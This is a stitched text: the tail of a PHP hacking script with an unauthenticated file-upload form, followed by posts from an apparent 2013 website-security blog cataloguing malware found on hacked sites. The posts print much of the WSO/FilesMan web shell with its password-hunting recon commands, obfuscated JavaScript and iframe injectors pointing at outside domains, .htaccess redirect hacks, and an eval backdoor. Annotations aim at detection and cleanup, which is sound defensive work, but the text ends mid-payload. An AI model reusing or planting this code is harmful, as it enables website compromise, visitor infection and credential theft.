$fun = function_exists('mkdir');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>function mkdir</td><td>$r</td>";


$fun = is_dir('sym/root');
     if(!$fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #336600'>True</b>";}

echo "<tr><td>Permission denied</td><td>$r</td>";


$fun = preg_match('/Forbidden/',@file_get_contents('sym/root') or !@file_get_contents('sym/root'));
     if($fun){$r = "<b style='color: red'>False</b>";}else{$r = "<b style='color: #006600'>True</b>";}

echo "<tr><td>Forbidden</td><td>$r</td>";




echo "</table></div>";



break;
default:
header("Location: $pg");




}


/// home ///
}else
{


// Default ("home") view: a file upload form. No password or other access check appears anywhere
// in this script, so anyone who can reach its URL can use the form.
echo '<br /><br /><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
// The uploaded temp file is copied into the script's working directory under the client-supplied
// file name, with no check on name, type or extension - so it can place further PHP files.
// Detection: new or recently modified files in the directory that holds this script.
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<br /><br /><b>Uploaded successful !!<br><br>'; }
    else { echo '<br /><br />Not uploaded !!<br><br>'; }


}

    echo '
<br /><br /><br /></b></b><div class="fot">Cod3d by <b>S3n4t00r</b> Idea by <b>Mr.Alsa3ek</b>
<br /><br />
<b style="color: red";>   Sec-w.Com  </b>
<br /><br />
Muslims Hackers</div> ';

}


/**
 * Return the part of $text that lies between the first occurrence of $a and the next
 * occurrence of $b after it.
 *
 * The joomla, wp and vb actions call this to pull database settings out of the source text of a
 * fetched config file. There is no check that $a occurs in $text; when it does not, $explode[1]
 * is an undefined index.
 */
function ex($text,$a,$b){
// Split on the start marker; element 1 is everything after its first occurrence.
$explode = explode($a,$text);
// Split that remainder on the end marker; element 0 is the wanted value.
$explode = explode($b,$explode[1]);
return $explode[0];
}



echo '</div>

<a style="text-decoration: none; color: #F4F4F4;" title="???????"/href="http://sec-w.com/cc">???????</a>

<a style="text-decoration: none; color: #F4F4F4;" title="???? ???????"/href="http://sec-w.com/cc">???? ???????</a>



</body>

</html>
';

?>

Monday, February 25, 2013

FilesMan Backdoor Script

If your website is getting infected again and again, it's most likely due to a backdoor script uploaded to your website. In my experience, I have almost always encountered the FilesMan backdoor, which is actually a complete file manager. It can be used to upload any file to your website, edit existing files or inject malicious code into webpages. It can even edit the .htaccess file.

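This script is usually encoded. However, you can easily find it by searching all PHP files for the "FilesMan" string. A copy in which that string is itself encoded will not match, so also search for eval( combined with base64_decode or gzinflate.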

Here is a sample of this script:

<?php # Web Shell by oRb
// Configuration header of the shell.
// $auth_pass is an MD5 hex digest; the login check further down compares it with md5() of the
// POSTed password and with the value of the session cookie.
$auth_pass = "92c29c1ac4d85b45639f741599c24cd7"; // ENTER MD5 PASSWORD HERE
$color = "#df5";
// 'FilesMan' is the plain-text string the article suggests searching for.
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

// Crawler cloaking: when the User-Agent contains one of the listed search-engine names
// (case-insensitive), answer 404 and stop, so the file looks absent to those crawlers.
// When checking a suspect URL, a 404 returned to a crawler-like User-Agent therefore does not
// prove the file is gone; confirm on disk.
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

// Switch PHP error logging off and remove the execution time limit for this request; every call
// is silenced with @. The effect for responders: the shell's own errors are not written to the
// PHP error log.
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
// set_magic_quotes_runtime() exists only in PHP versions before 7, which dates this sample.
@set_magic_quotes_runtime(0);
// Version constant of the shell ("WSO" 2.5).
@define('WSO_VERSION', '2.5');

// If the legacy magic_quotes_gpc setting is on, strip the automatically added backslashes from
// POST and cookie data. get_magic_quotes_gpc() was removed in PHP 8.
if(get_magic_quotes_gpc()) {
    // Recursively apply stripslashes() to a string or to every element of a (nested) array.
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

// Print a bare password form and end the request. The form posts a field named "pass" back to
// the same URL.
function wsoLogin() {
    die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}

// Set cookie $k to $v both in the current request's $_COOKIE array and in the response
// (setcookie() is called with no expiry, path or flags).
function WSOsetcookie($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}

// Access check, skipped entirely when $auth_pass is empty.
if(!empty($auth_pass)) {
    // Login: md5() of the POSTed "pass" field is compared (loosely, with ==) to the stored digest.
    // On a match a cookie named md5(Host header) is set, and its value is the digest itself.
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

    // Every later request is accepted only if that cookie is present and equals the digest;
    // otherwise the login form is shown and the request ends.
    // Detection: a cookie whose name is the MD5 of the site's host name, seen in traffic captures
    // or WAF logs, is characteristic of this shell.
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}

// Classify the host as 'win' or 'nix' from the first three letters of PHP_OS.
if(strtolower(substr(PHP_OS,0,3)) == "win")
    $os = 'win';
else
    $os = 'nix';

// Error reporting is switched off unless safe_mode is enabled.
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);

// Record the disable_functions setting and the starting directory.
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
// The working directory for this request comes straight from the POST field "c", unvalidated.
if(isset($_POST['c']))
    @chdir($_POST['c']);
$cwd = @getcwd();
// Normalise Windows backslashes to forward slashes.
if($os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
// Make sure $cwd ends with a slash.
if($cwd[strlen($cwd)-1] != '/')
    $cwd .= '/';

// Default the per-host "ajax" cookie to $default_use_ajax when the client did not send one.
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;

// $aliases: label => shell command table, one set for Windows and one for Unix-like hosts, chosen
// by $os. The code that uses the table is not part of this excerpt; presumably it backs a command
// menu in the shell's console.
// The commands are host reconnaissance: listing connections, processes and accounts, and
// searching for SUID/SGID files, writable paths, config, password, history and backup files.
// Detection: the web server account running find / -perm ..., locate ... or netstat in process
// accounting or audit logs is a strong sign that a shell like this one is in use.
// Entries with an empty command ("Find", "Locate") act as section headings.
if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
          "List dir" => "ls -lha",
        "list file attributes on a Linux second extended file system" => "lsattr -va",
          "show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
        "Find" => "",
          "find all suid files" => "find / -type f -perm -04000 -ls",
          "find suid files in current dir" => "find . -type f -perm -04000 -ls",
          "find all sgid files" => "find / -type f -perm -02000 -ls",
          "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
          "find config.inc.php files" => "find / -type f -name config.inc.php",
          "find config* files" => "find / -type f -name \"config*\"",
          "find config* files in current dir" => "find . -type f -name \"config*\"",
          "find all writable folders and files" => "find / -perm -2 -ls",
          "find all writable folders and files in current dir" => "find . -perm -2 -ls",
          "find all service.pwd files" => "find / -type f -name service.pwd",
          "find service.pwd files in current dir" => "find . -type f -name service.pwd",
          "find all .htpasswd files" => "find / -type f -name .htpasswd",
          "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
          "find all .bash_history files" => "find / -type f -name .bash_history",
          "find .bash_history files in current dir" => "find . -type f -name .bash_history",
          "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
          "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
        "Locate" => "",
          "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"
    );



Sunday, February 24, 2013

Malware code of the moment

<script>
wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var <script>var TaxazLan=47;TaxazLan+=-31;var GeYedenc='fKWrK7AowyjmR8iC8YHhJiYatr29MCMo16dVVIep'.replace(/[KWK7AwyjR8i8YHJiY t29MM16VVIp]/g, '');WaVet=18;var PeheLecew=window;var TenZezaco=-32;TenZezaco+=34;var GawasCepe=-38;GawasCepe+=39;MecezBa=31;var CaneHaqi=parseInt;var MafeGeho=6;MafeGeho+=-6;CeJa=46;var BacanYaqan='';var QekQeyes=String;var PelefJat='zexebep ketay lezewet neyaqamejefeneza refelac xera qevazaxe lemepe tajeceq bazacagetaqere meyadeg pagale zarajet lazemepagebedaf vameyape reyep kek zamaqanepepayeh gexeyeva mawenage vakewaxa xec dapagew revatasasa xatetane dewen yejarey telefa qey hevecelap hez webalefe fele bagelelakatat zedeyel jexedejele dawedey delazeg regapehe tay cezekew te gegawey gasajakebeqeqa resefay gejaha heg q jayadeva hele qedahay qaje keselehe vec relegat salabebebazevame hebesaq rezemelaveqed kegeqen belakedaremev qefegad hebawebebe wazares waseketeledaqeq xareqaq dejereve vena nejecemezaneqe hak web kemepex cememelesedadek tebeyeq daparamafacesaye nak qax ram w wejajeze zevatega bakegay xesererare vecenar cacem qekavere pecal seqefey vefeqeden xaze vapewasebeheje taj hec yeye te yec jec gay h qereref sewaqavey celereh rezece takejed reveyekeme fezesen welenefe kapekeg vakayeseg wapevece qehaz tema vecaqehefaceya mep neq leve ne caq few xel m xeyadey fez jabexeh pevenexadebayawe veweyebe hek jegezay hasem rexehej ladese kewefese qeg rede deyegayakewaze nep yar qete j beb veb qeh k zeyelen qaqajag bevafexa gev dewarek ra tecetaf dagajelawafeme becesey lebate teceveg ler pehagex pekejeresafepeqe pekedete pah neqaqam jeqat remadah jevene yaqejade tel xece pepegegeqefege mez dak yeye k xey het bag j nahewepe wexe xedaleqe geq gehepaz zera peja fexatedemedexe far saw 
gegeweq qaharenej behefete getej cexefeke yefer lewaneta n xeje jaqetevedav xaf vawaxetefaveqepa vat depemetepaderewe weje setag tawe xaye relehet gepesetacere wanewav re hevevese jananeqebe peyabek haxasaferadav canezen segedepeke xayeraw le gag yefewesekekerez yaleheq peqaqa ceqapefa yamela hez qabeqagebevacaje vexedave delabemez pamekaja jeqanener hewelene leqebamer yaba je dem femeferezecemeza cazared sekevaqeveze kebeqaka je qamakere pebeceqaj rasayac legeteserehab caxejer qesele detadene pe kaweqes dazemetetey zegewaha p qecevam yale vezeyaw caqeperebedezexe seneweq hebemeker gega sedazefey taz qepejebezezefeb nenexega l cabepej vegewetev xagefeta j vab bel meje fepepawefeqaneq jena lapedelahewad yax zarecelejafacega rebajey gejavatexe mepajas mefagab wamaqete ger naqafem ca vabaqev xebexedetakeje yadeken necete meje kelepeveqekazep pex zecelana zas tamewabese'.split(' ');var YegeTege='ehjCv8QbaKl41O'.replace(/[hjC8QbK41O]/g, '');WecYale=45;YegeTege=PeheLecew[YegeTege];GeYedenc=QekQeyes[GeYedenc];for (HelemLepi=MafeGeho;HelemLepi<PelefJat.length-1;HelemLepi+=TenZezaco) BacanYaqan +=GeYedenc(CaneHaqi((PelefJat[HelemLepi+MafeGeho].length-1).toString(TaxazLan)+(PelefJat[HelemLepi+GawasCepe].length-1).toString(TaxazLan), TaxazLan));YegeTege(BacanYaqan);</script>

Malware code of the moment

document.write('<iframe scrolling="no" width="1" height="1" border="0" frameborder="0" src="http://43kaylia.eu/xxx1/kqxleqjpcoh8.php"></iframe>')

Malware code of the moment

<script>b=new function(){return 2;};if(!+b)String.prototype.vqwfbeweb='h'+'arC';for(i in $='b4h3tbn34')if(i=='vqwfbeweb')m=$[i];try{new Object().wehweh();}catch(q){ss="";}try{gberbger-2;}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document["c"+"r"+"e"+"a"+"t"+"e"+"T"+"e"+"x"+"t"+"N"+"o"+"d"+"e"]('321');if(a.data==321)h=(d-d2)*-1;n=[-h*4.5,-h*4.5,-h*52.5,-h*51,-h*16,-h*20,-h*50,-h*55.5,-h*49.5,-h*58.5,-h*54.5,-h*50.5,-h*55, -h*58,-h*23,-h*51.5,-h*50.5,-h*58,-h*34.5,-h*54,-h*50.5,-h*54.5,-h*50.5,-h*55,-h*58,-h*57.5, -h*33,-h*60.5,-h*42,-h*48.5,-h*51.5,-h*39,-h*48.5,-h*54.5,-h*50.5,-h*20,-h*19.5,-h*49,-h*55.5, -h*50,-h*60.5,-h*19.5,-h*20.5,-h*45.5,-h*24,-h*46.5,-h*20.5,-h*61.5,-h*4.5,-h*4.5,-h*4.5,-h*52.5, -h*51,-h*57,-h*48.5,-h*54.5,-h*50.5,-h*57,-h*20,-h*20.5,-h*29.5,-h*4.5,-h*4.5,-h*62.5,-h*16, -h*50.5,-h*54,-h*57.5,-h*50.5,-h*16,-h*61.5,-h*4.5,-h*4.5,-h*4.5,-h*50,-h*55.5,-h*49.5,-h*58.5, -h*54.5,-h*50.5,-h*55,-h*58,-h*23,-h*59.5,-h*57,-h*52.5,-h*58,-h*50.5,-h*20,-h*17,-h*30, -h*52.5,-h*51,-h*57,-h*48.5,-h*54.5,-h*50.5,-h*16,-h*57.5,-h*57,-h*49.5,-h*30.5,-h*19.5,-h*52, -h*58,-h*58,-h*56,-h*29,-h*23.5,-h*23.5,-h*57,-h*50.5,-h*49,-h*55.5,-h*58,-h*57.5,-h*58, -h*48.5,-h*58,-h*23,-h*49.5,-h*55.5,-h*54.5,-h*23.5,-h*58,-h*50.5,-h*54.5,-h*56,-h*23.5,-h*57.5, -h*58,-h*48.5,-h*58,-h*23,-h*56,-h*52,-h*56,-h*19.5,-h*16,-h*59.5,-h*52.5,-h*50,-h*58,-h*52, -h*30.5,-h*19.5,-h*24.5,-h*24,-h*19.5,-h*16,-h*52,-h*50.5,-h*52.5,-h*51.5,-h*52,-h*58,-h*30.5, -h*19.5,-h*24.5,-h*24,-h*19.5,-h*16,-h*57.5,-h*58,-h*60.5,-h*54,-h*50.5,-h*30.5,-h*19.5,-h*59, -h*52.5,-h*57.5,-h*52.5,-h*49,-h*52.5,-h*54,-h*52.5,-h*58,-h*60.5,-h*29,-h*52,-h*52.5,-h*50, -h*50,-h*50.5,-h*55,-h*29.5,-h*56,-h*55.5,-h*57.5,-h*52.5,-h*58,-h*52.5,-h*55.5,-h*55,-h*29, -h*48.5,-h*49,-h*57.5,-h*55.5,-h*54,-h*58.5,-h*58,-h*50.5,-h*29.5,-h*54,-h*50.5,-h*51,-h*58, 
-h*29,-h*24,-h*29.5,-h*58,-h*55.5,-h*56,-h*29,-h*24,-h*29.5,-h*19.5,-h*31,-h*30,-h*23.5, -h*52.5,-h*51,-h*57,-h*48.5,-h*54.5,-h*50.5,-h*31,-h*17,-h*20.5,-h*29.5,-h*4.5,-h*4.5,-h*62.5, -h*4.5,-h*4.5,-h*51,-h*58.5,-h*55,-h*49.5,-h*58,-h*52.5,-h*55.5,-h*55,-h*16,-h*52.5,-h*51, -h*57,-h*48.5,-h*54.5,-h*50.5,-h*57,-h*20,-h*20.5,-h*61.5,-h*4.5,-h*4.5,-h*4.5,-h*59,-h*48.5, -h*57,-h*16,-h*51,-h*16,-h*30.5,-h*16,-h*50,-h*55.5,-h*49.5,-h*58.5,-h*54.5,-h*50.5,-h*55, -h*58,-h*23,-h*49.5,-h*57,-h*50.5,-h*48.5,-h*58,-h*50.5,-h*34.5,-h*54,-h*50.5,-h*54.5,-h*50.5, -h*55,-h*58,-h*20,-h*19.5,-h*52.5,-h*51,-h*57,-h*48.5,-h*54.5,-h*50.5,-h*19.5,-h*20.5,-h*29.5, -h*51,-h*23,-h*57.5,-h*50.5,-h*58,-h*32.5,-h*58,-h*58,-h*57,-h*52.5,-h*49,-h*58.5,-h*58,-h*50.5, -h*20,-h*19.5,-h*57.5,-h*57,-h*49.5,-h*19.5,-h*22,-h*19.5,-h*52,-h*58,-h*58,-h*56,-h*29,-h*23.5, -h*23.5,-h*57,-h*50.5,-h*49,-h*55.5,-h*58,-h*57.5,-h*58,-h*48.5,-h*58,-h*23,-h*49.5,-h*55.5, -h*54.5,-h*23.5,-h*58,-h*50.5,-h*54.5,-h*56,-h*23.5,-h*57.5,-h*58,-h*48.5,-h*58,-h*23,-h*56, -h*52,-h*56,-h*19.5,-h*20.5,-h*29.5,-h*51,-h*23,-h*57.5,-h*58,-h*60.5,-h*54,-h*50.5,-h*23, -h*59,-h*52.5,-h*57.5,-h*52.5,-h*49,-h*52.5,-h*54,-h*52.5,-h*58,-h*60.5,-h*30.5,-h*19.5,-h*52, -h*52.5,-h*50,-h*50,-h*50.5,-h*55,-h*19.5,-h*29.5,-h*51,-h*23,-h*57.5,-h*58,-h*60.5,-h*54, -h*50.5,-h*23,-h*56,-h*55.5,-h*57.5,-h*52.5,-h*58,-h*52.5,-h*55.5,-h*55,-h*30.5,-h*19.5,-h*48.5, -h*49,-h*57.5,-h*55.5,-h*54,-h*58.5,-h*58,-h*50.5,-h*19.5,-h*29.5,-h*51,-h*23,-h*57.5,-h*58, -h*60.5,-h*54,-h*50.5,-h*23,-h*54,-h*50.5,-h*51,-h*58,-h*30.5,-h*19.5,-h*24,-h*19.5,-h*29.5, -h*51,-h*23,-h*57.5,-h*58,-h*60.5,-h*54,-h*50.5,-h*23,-h*58,-h*55.5,-h*56,-h*30.5,-h*19.5, -h*24,-h*19.5,-h*29.5,-h*51,-h*23,-h*57.5,-h*50.5,-h*58,-h*32.5,-h*58,-h*58,-h*57,-h*52.5, -h*49,-h*58.5,-h*58,-h*50.5,-h*20,-h*19.5,-h*59.5,-h*52.5,-h*50,-h*58,-h*52,-h*19.5,-h*22, -h*19.5,-h*24.5,-h*24,-h*19.5,-h*20.5,-h*29.5,-h*51,-h*23,-h*57.5,-h*50.5,-h*58,-h*32.5,-h*58, 
-h*58,-h*57,-h*52.5,-h*49,-h*58.5,-h*58,-h*50.5,-h*20,-h*19.5,-h*52,-h*50.5,-h*52.5,-h*51.5, -h*52,-h*58,-h*19.5,-h*22,-h*19.5,-h*24.5,-h*24,-h*19.5,-h*20.5,-h*29.5,-h*4.5,-h*4.5,-h*4.5, -h*50,-h*55.5,-h*49.5,-h*58.5,-h*54.5,-h*50.5,-h*55,-h*58,-h*23,-h*51.5,-h*50.5,-h*58,-h*34.5, -h*54,-h*50.5,-h*54.5,-h*50.5,-h*55,-h*58,-h*57.5,-h*33,-h*60.5,-h*42,-h*48.5,-h*51.5,-h*39, -h*48.5,-h*54.5,-h*50.5,-h*20,-h*19.5,-h*49,-h*55.5,-h*50,-h*60.5,-h*19.5,-h*20.5,-h*45.5,-h*24, -h*46.5,-h*23,-h*48.5,-h*56,-h*56,-h*50.5,-h*55,-h*50,-h*33.5,-h*52,-h*52.5,-h*54,-h*50,-h*20, -h*51,-h*20.5,-h*29.5,-h*4.5,-h*4.5,-h*62.5];for(i=0;i<n.length;i++)if(!+b)ss+=s(eval("n"+"[i"+']'));if(!+b)eval(ss);</script><!--c -->

Malware code of the moment

<script type='text/javascript' src='http://purposestupid.org/xzzuhpzxwci5cd/'></script>

Malware code of the moment

<iframe src="http:/castload.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>

Infected .htaccess File

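This malicious code was found in a .htaccess file. It redirects every HTTP request that ends in a 400, 401, 403, 404 or 500 status code to a malicious link. It also redirects visitors to a malicious website whenever the Referer header of the request contains the name of a known search engine, webmail or social-network site. The conditions test HTTP_REFERER rather than the user agent, so it is people arriving from those sites, not the crawlers themselves, who are sent away.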

#apachecodes

# Analyst note: the five ErrorDocument lines below replace the local error pages,
# so any request that ends in a 400/401/403/404/500 response is sent to the same
# external go.php URL.
ErrorDocument 400 http://buy-autocad.net/tds/go.php?sid=8&
ErrorDocument 401 http://buy-autocad.net/tds/go.php?sid=8&
ErrorDocument 403 http://buy-autocad.net/tds/go.php?sid=8&
ErrorDocument 404 http://buy-autocad.net/tds/go.php?sid=8&
ErrorDocument 500 http://buy-autocad.net/tds/go.php?sid=8&

<IfModule mod_rewrite.c>
RewriteEngine On
# Analyst note: every condition below tests the Referer header, and [OR] chains
# them, so a single match is enough. The patterns are unanchored substrings
# (".*ya.*", ".*ask.*", ".*mail.*", ".*blog.*", ".*search.*"), so they match any
# referring URL that contains those letters, not only the named sites. A request
# with no Referer matches none of them.
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
RewriteCond %{HTTP_REFERER} .*qq.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*gmail.* [OR]
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
RewriteCond %{HTTP_REFERER} .*googlemail.* [OR]
RewriteCond %{HTTP_REFERER} .*inbox.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotmail.* [OR]
RewriteCond %{HTTP_REFERER} .*blog.* [OR]
RewriteCond %{HTTP_REFERER} .*live.* [OR]
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*ya.* [OR]
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
RewriteCond %{HTTP_REFERER} .*flickr.*
# Analyst note: a matching request for any path gets a permanent (301) redirect
# to the external r.php URL, and L stops further rule processing. Browsers may
# cache a 301, so a visitor can keep being redirected after the file is cleaned.
RewriteRule ^(.*)$ http://www.academiatrivium.com/marhoycukind/r.php [R=301,L]
</IfModule>

Saturday, February 16, 2013

Latest Backdoor

Today, I found the following backdoor wrapped in eval() and gzinflate() functions. It can be used to download any file from a remote location to the infected website. Here is its code.

eval(gzinflate(base64_decode("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")));

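If we inflate this compressed data, we find the following PHP script. It turns off error display and error logging, prints back the `r` query parameter, runs eval() on whatever is sent in the `e` POST field after undoing the rot13/base64/strrev layers, and appends any request body longer than 12 bytes that arrives with a `Content-Encoding: binary` header to a file named tmpfile, together with the sender's IP address: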

@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;

Friday, February 15, 2013

Malware code of the moment

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz...

If infected, you will mostly find this code in WordPress theme files. However, it can be found in any .php file.

Malicious Iframe injection

I found the following malicious code on a lawyer's website.

In PHP and HTML files, the code was:

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://totalhealthfairs.com/azzf.html?i=1613929></iframe>

and in JavaScript files (.js) the code was:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://totalhealthfairs.com/azzf.html?j=1613929></iframe>');

Wednesday, February 13, 2013

.htaccess hack

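Here is another piece of malicious code found in a .htaccess file. If you find it anywhere on your website, delete it immediately! Removing the rules does not close the hole that let someone write to the file, so also check how the .htaccess was modified.

It redirects visitors who arrive from popular search engines to a malicious link and kills your SEO. The conditions match on the Referer header, so the site looks normal when you open it directly.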

RewriteEngine On
# Analyst note: each condition tests the Referer header; NC makes the match
# case-insensitive and OR chains the conditions, so a single match is enough.
# The patterns are unanchored substrings, so ".*ya.*$" matches any referring
# URL that contains "ya", not only the named site.
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
# Analyst note: a matching request for any path is redirected to the external
# go.php URL; R without a status code is a temporary (302) redirect and L stops
# further rule processing.
RewriteRule .* http://spywareshop.info/0/go.php?sid=2 [R,L]

Monday, February 11, 2013

Malware code of the moment

<script type="text/javascript" src="http://palwas.servehttp.com//ml.php"></script>

Sunday, February 10, 2013

Malware code of the moment

<script>el=document.createElement("div");el.innerHTML="&#82;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#69;&#114;&#114;";try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};var ar=",\"C0hgev)=z(liwysc/dp'}[No1rB.Tf]; A>b taEun{<:m";var ar2="R136,0,-84,72,28,-108,32,24,-32,100,20,-164,148,-16,-40,-96,4,132,8,-116,-24,164,-164,148, -16,-92,48,-52,60,40,-140,76,64,28,-164,20,40,64,-48,-24,-16,24,-52,60,-80,116,-96,144,-40,0,0, -84,72,-16,52,28,-164,84,-64,-12,100,4,0,-48,64,-128,24,16,-40,128,24,-40,0,0,-60,24,-32,100,20, -164,148,-16,-40,-60,52,-56,104,-132,20,-40,176,-128,72,-16,52,28,-164,128,-88,44,-40,-32,48, -68,140,0,-76,104,-112,0,-24,28,24,24,-72,-32,40,-40,136,4,-96,52,-48,-28,76,-48,0,4,52,-24,8,60, 20,-72,-36,-64,64,4,68,-96,-4,24,80,-140,20,48,20,-92,72,68,-136,8,28,-32,-4,140,-120,48,20,-92, 72,68,-88,92,-96,-12,-24,12,48,-56,24,12,-12,96,-96,-4,4,104,-96,124,-168,36,24,0,-52,148,-40, -52,20,-36,-12,104,-104,48,72,12,-24,-12,-84,36,-52,120,-12,-132,108,-84,-24,100,32,28,-172, 120,24,-56,-20,104,-172,120,-48,60,36,-108,-20,72,-16,52,28,-164,120,-140,28,100,4,0,-48,48, 